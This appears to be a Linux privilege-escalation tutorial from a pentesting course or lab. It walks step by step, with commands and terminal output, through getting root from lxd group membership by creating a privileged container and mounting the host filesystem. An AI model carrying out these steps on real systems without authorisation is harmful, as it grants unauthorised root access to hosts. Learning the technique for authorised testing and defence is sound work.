Privileged Groups: Linux PrivEsc


LXD is comparable to Docker and acts as Ubuntu’s container manager. After installation, all user profiles are incorporated into the LXD group.

Being part of this group allows users to elevate their privileges which can be utilized by establishing an LXD container, setting it as privileged, and subsequently accessing the host file system at /mnt/root.

We need to verify group membership and take advantage of these permissions to upgrade to root.

devops@NIX02:~$ id

uid=1009(devops) gid=1009(devops) groups=1009(devops),110(lxd)

Unzip the Alpine image.

devops@NIX02:~$ unzip 

extracting: 64-bit Alpine/alpine.tar.gz  
inflating: 64-bit Alpine/alpine.tar.gz.root  
cd 64-bit\ Alpine/

Begin the initialization process for LXD. Opt for the default options at each prompt.

devops@NIX02:~$ lxd init

Do you want to configure a new storage pool (yes/no) [default=yes]? yes
Name of the storage backend to use (dir or zfs) [default=dir]: dir
Would you like LXD to be available over the network (yes/no) [default=no]? no
Do you want to configure the LXD bridge (yes/no) [default=yes]? yes

/usr/sbin/dpkg-reconfigure must be run as root
error: Failed to configure the bridge
devops@NIX02:~$ lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine

Generating a client certificate. This may take a minute...
If this is your first time using LXD, you should also run: sudo lxd init
To start your first container, try: lxc launch ubuntu:16.04

Image imported with fingerprint: be1ed370b16f6f3d63946d47eb57f8e04c77248c23f47a41831b5afff48f8d1b
devops@NIX02:~$ lxc init alpine r00t -c security.privileged=true

Creating r00t
devops@NIX02:~$ lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true

Device mydev added to r00t
devops@NIX02:~$ lxc start r00t
devops@NIX02:~/64-bit Alpine$ lxc exec r00t /bin/sh

~ # id
uid=0(root) gid=0(root)
~ # 


secaudit@NIX02:~$ id

uid=1010(secaudit) gid=1010(secaudit) groups=1010(secaudit),4(adm)

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